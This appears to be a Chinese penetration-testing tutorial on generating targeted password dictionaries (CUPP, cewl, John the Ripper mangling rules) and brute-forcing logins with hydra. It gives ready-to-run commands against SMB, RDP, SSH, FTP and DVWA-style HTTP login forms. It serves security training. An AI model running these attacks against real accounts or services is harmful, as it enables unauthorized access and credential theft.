字典

CUPP

按个人信息生成其专属的密码字典
CUPP：Common User Password Profiler

安装

git clone https://github.com/Mebus/cupp.git

字典制作、在线密码破解

使用

python cupp.py-i

输入上面命令会和程序进行交互，输入相关的信息就行

字典制作、在线密码破解

通过收集网站信息生成字典

cewl 1.1.1.1 -m 3 -d 3 -e -c -v -w a.txt
  # -m:最小单词长度
  -d 爬网深度
  -e 收集包含email地址信息
  -c 每个单词出现次数
  支持基本、摘要身份认证
  支持代理

用户密码变型

基于cewl的结果进行密码类型
末尾增加数字串
字母大小写变化
字母与符号相互转换
字母与数字相互转换
P@$$w0rd

使用John the Ripper配置文件实现密码动态变型

/etc/john/john.conf
  - [List.Rules:Wordlist]
  - $[0-9]$[0-9]$[0-9]
  - john --wordlist=cewl.txt -rules --stdout > m.txt (根据基本的字典生成新的字典)
-[list.Rules:test]
  $[0-9]$[0-9]$[0-9]$[a-zA-Z]
  $[0-9]$[0-9]$[0-9]$[a-zA-Z]$[a-zA-Z]$[a-zA-Z]$[`~!@#$%^&*()-_=+]
- john --wordlist=cewl.txt --rules=test --stdout > m.txt
- john --wordlist=ahm.lst --rules=test HASHFILE

在线密码破解——hydra

hydra

九头蛇，砍去一个头即长出新头，后为大力神赫拉克勒斯所杀

Windows密码破解

hydra -l administrator -P pass.lst smb://1.1.1.1/admin$ -vV
hydra -l administrator -P pass.lst rdp://1.1.1.1 -t 1 -vV

字典制作、在线密码破解

Linux密码破解

hydra -l root -P pass.lst ssh://1.1.1.1 -vV

其他服务密码破解

hydra -L user.lst -P pass.lst ftp://1.1.1.1 -s 2121 -e nsr -o p.txt -t 64

图形化界面

xhydra

字典制作、在线密码破解

HTTP表单身份认证

hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Lin:S=index.php" -V

字典制作、在线密码破解

hydra -l admin -P pass.lst 1.1.1.1 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login Failed" -V

/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo:Foo
  C:先访问指定页面获得cookie
  H：指定http头
  https-post-formhttp-get-formhttps-get-form
  -S:使用SSL连接

文章版权归作者所有，未经允许请勿转载。如内容涉嫌侵权，请在本页底部进入<联系我们>进行举报投诉!

THE END